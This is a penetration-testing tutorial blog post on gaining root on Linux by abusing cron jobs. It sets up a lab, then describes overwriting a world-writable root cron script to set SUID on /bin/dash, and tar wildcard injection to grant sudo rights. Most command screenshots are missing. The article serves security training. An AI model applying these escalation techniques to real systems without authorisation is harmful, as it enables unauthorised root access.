Linux Privilege Escalation by Exploiting Cronjobs

After solving several OSCP Challenges we decided to write the article on the various method used for Linux privilege escalation, that could be helpful for our readers in their penetration testing project. In this article, we will learn “Privilege Escalation by exploiting Cron Jobs” to gain root access of a remote host machine and also examine how a bad implement cron job can lead to Privilege escalation. If you have solved CTF challenges for Post exploit then by reading this article you will realize the several loopholes that lead to privileges escalation.

For details, you can read our previous article where we had applied this trick for privilege escalation. Open the links given below:

Link1: Hack the Box Challenge: Europa Walkthrough

Link2: Hack the Milnet VM (CTF Challenge)

Table of content

  • Introduction
  • Cron job
  • Crontab syntax
  • Crontab File overwrite
  • Lab Setup (Ubuntu)
  • Exploiting cron job (Kali Linux)
  • Crontab Tar wildcard Injection
  • Lab Setup (Ubuntu)
  • Exploiting cron job (Kali Linux)

Let’s Start!!!

What is cron job?

Cron Jobs are used for scheduling tasks by executing commands at specific dates and times on the server. They’re most commonly used for sysadmin jobs such as backups or cleaning /tmp/ directories and so on. The word Cron comes from crontab and it is present inside /etc directory.

 

For example:  Inside crontab we can add following entry to print apache error logs automatically in every 1 hour.

Crontab File overwrite

Lab Setup for Poorly configured cron job

 Objective: Set a new job with help of crontab to run a python script which will erase all data from in a particular directory.

Let assume “cleanup” is the directory whose data will be cleared automatically in every two minutes. Thus we have saved some data inside /home/cleanup.

As you can observe from given image some files are stored inside cleanup directory.

Now write a python program in any other directory to delete data from inside /home/cleanup and give it all permission.

chmod 777 cleanup.py

At last schedule a task with help of crontab to run cleanup.py for every 2 minutes.

Now let’s verify the objectives

Coool!! It is working, as you can see all file has been deleted after two minutes.

Post Exploitation

Start your attacking machine and first compromise the target system and then move to privilege escalation stage. Suppose I successfully login into victim’s machine through ssh and access non-root user terminal. Execute the following command as shown below.

 From above steps, we notice the crontab is running python script in every two minutes now let’s exploit.

There so many methods to gain root access as in this method we enabled SUID bits /bin/dash. It is quite simple, first, open the file through some editor, for example, nanocleanup.py and replace “rm -r /tmp/*” from the following line as given below

After two minutes it will set SUID permission for /bin/dash and when you will run it will give root access.

Awesome!! We hit the Goal…………………

Crontab Tar Wildcard Injection

Lab Setup

Objective: schedule a task with help of crontab to take backup with tar archival program of HTML directory.

The directory should have executable permission whose backup you are going to take.

Now schedule a task with help of crontab to run tar archival program for taking backup of /html inside /var/backups in every 1 minute.

Let’s verify the schedule is working or not by executing following command.

From given below image you can notice the html.tgz file has been generated after 1 minute.

Post Exploitation

Start your attacking machine and first compromise the target system and then move to privilege escalation stage. Suppose I successfully login into victim’s machine through ssh and access non-root user terminal. Then open crontab to view if any job is scheduled.

cat /etc/crontab

Here we notice the target has scheduled a tar archival program for every 1 minute and we know that cron job runs as root. Let’s try to exploit.

Execute following command to grant sudo right to logged user and following post exploitation is known as wildcard injection.

Now after 1 minute it will grant sudo right to the user: ignite as you can confirm this with the given below image.

YUPPIEEEE!!! We have successfully obtained root access.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Related Posts Plugin for WordPress, Blogger...

Leave a Reply

Your email address will not be published. Required fields are marked *